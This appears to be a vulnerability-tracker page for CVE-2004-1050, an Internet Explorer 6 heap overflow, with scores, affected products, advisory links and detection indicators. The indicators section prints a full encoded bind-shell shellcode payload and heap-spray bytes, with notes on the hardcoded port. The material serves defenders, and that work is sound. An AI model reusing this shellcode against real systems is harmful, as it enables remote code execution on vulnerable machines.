CVE-2004-1050
published 2004-12-31CVE-2004-1050: Heap-based buffer overflow in Internet Explorer 6 allows remote attackers to execute arbitrary code via long (1) SRC or (2) NAME attributes in IFRAME, FRAME…
PriorityP270critical10CVSS 2.0
AVNACLAuNCCICAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
67.06%
99.2th percentile
Heap-based buffer overflow in Internet Explorer 6 allows remote attackers to execute arbitrary code via long (1) SRC or (2) NAME attributes in IFRAME, FRAME, and EMBED elements, as originally discovered using the mangleme utility, aka "the IFRAME vulnerability" or the "HTML Elements Vulnerability."
Affected
24 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| avaya | definity_one_media_server | — | — |
| avaya | definity_one_media_server | — | — |
| avaya | definity_one_media_server | — | — |
| avaya | definity_one_media_server | — | — |
| avaya | definity_one_media_server | — | — |
| avaya | definity_one_media_server | — | — |
| avaya | definity_one_media_server | — | — |
| avaya | ip600_media_servers | — | — |
| avaya | ip600_media_servers | — | — |
| avaya | ip600_media_servers | — | — |
| avaya | ip600_media_servers | — | — |
| avaya | ip600_media_servers | — | — |
| avaya | ip600_media_servers | — | — |
| avaya | ip600_media_servers | — | — |
| avaya | modular_messaging_message_storage_server | — | — |
| avaya | s8100 | — | — |
| avaya | s8100 | — | — |
| avaya | s8100 | — | — |
| avaya | s8100 | — | — |
| avaya | s8100 | — | — |
| avaya | s8100 | — | — |
| avaya | s8100 | — | — |
| microsoft | ie | — | — |
| microsoft | internet_explorer | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb
bytes↗
%u0D0D%u0D0D
- →Exploit targets heap-based buffer overflow via long SRC or NAME attributes in IFRAME, FRAME, or EMBED HTML elements in Internet Explorer 6; detect anomalously long attribute values in these tags in HTTP responses. ↗
- →Exploit uses JavaScript heap spray with NOP sled bytes 0x0D0D0D0D; detect repeated 0x0D0D sequences in script content of HTML pages served to IE6 clients. ↗
- →Exploit drops a bind shell on TCP port 28876; monitor for unexpected listening services or outbound connections on this port following IE6 browsing activity. ↗
- →Shellcode begins with marker bytes 0x43 0x43 0x43 0x43 (ASCII 'CCCC') followed by a short JMP; use this as a byte-level signature to detect the payload in network traffic or memory. ↗
- ·The PoC shellcode is a looping bind shell; the port (28876) is hardcoded in the shellcode itself and would need to be changed by an attacker reusing this payload — detections keyed solely on port 28876 may miss modified variants. ↗
- ·Heap spray block size is 0x40000 dwords; heap-spray detections should account for this specific allocation size when tuning memory-based heuristics for this exploit. ↗
CVSS provenance
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-r65h-9rm3-h7gm: Heap-based buffer overflow in Internet Explorer 6 allows remote attackers to execute arbitrary code via long (1) SRC or (2) NAME attributes in IFRAME,
ghsa_unreviewed·2022-04-29
CVE-2004-1050 [HIGH] GHSA-r65h-9rm3-h7gm: Heap-based buffer overflow in Internet Explorer 6 allows remote attackers to execute arbitrary code via long (1) SRC or (2) NAME attributes in IFRAME,
Heap-based buffer overflow in Internet Explorer 6 allows remote attackers to execute arbitrary code via long (1) SRC or (2) NAME attributes in IFRAME, FRAME, and EMBED elements, as originally discovered using the mangleme utility, aka "the IFRAME vulnerability" or the "HTML Elements Vulnerability."
VulnCheck
avaya ip600_media_servers Out-of-bounds Write
vulncheck·2004·CVSS 10.0
CVE-2004-1050 [CRITICAL] avaya ip600_media_servers Out-of-bounds Write
avaya ip600_media_servers Out-of-bounds Write
Heap-based buffer overflow in Internet Explorer 6 allows remote attackers to execute arbitrary code via long (1) SRC or (2) NAME attributes in IFRAME, FRAME, and EMBED elements, as originally discovered using the mangleme utility, aka "the IFRAME vulnerability" or the "HTML Elements Vulnerability."
Affected: avaya ip600_media_servers
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://learn.microsoft.com/en-us/security-updates/securitybulletins/2004/ms04-040
No detection rules found.
No writeups or analysis indexed.
http://lists.grok.org.uk/pipermail/full-disclosure/2004-October/028009.htmlhttp://lists.grok.org.uk/pipermail/full-disclosure/2004-October/028035.htmlhttp://marc.info/?l=bugtraq&m=109942758911846&w=2http://secunia.com/advisories/12959/http://www.kb.cert.org/vuls/id/842160http://www.securityfocus.com/archive/1/379261http://www.securityfocus.com/bid/11515http://www.us-cert.gov/cas/techalerts/TA04-315A.htmlhttp://www.us-cert.gov/cas/techalerts/TA04-336A.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2004/ms04-040https://exchange.xforce.ibmcloud.com/vulnerabilities/17889https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1294http://lists.grok.org.uk/pipermail/full-disclosure/2004-October/028009.htmlhttp://lists.grok.org.uk/pipermail/full-disclosure/2004-October/028035.htmlhttp://marc.info/?l=bugtraq&m=109942758911846&w=2http://secunia.com/advisories/12959/http://www.kb.cert.org/vuls/id/842160http://www.securityfocus.com/archive/1/379261http://www.securityfocus.com/bid/11515http://www.us-cert.gov/cas/techalerts/TA04-315A.htmlhttp://www.us-cert.gov/cas/techalerts/TA04-336A.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2004/ms04-040https://exchange.xforce.ibmcloud.com/vulnerabilities/17889https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1294
2004-12-31
Published
Exploited in the wild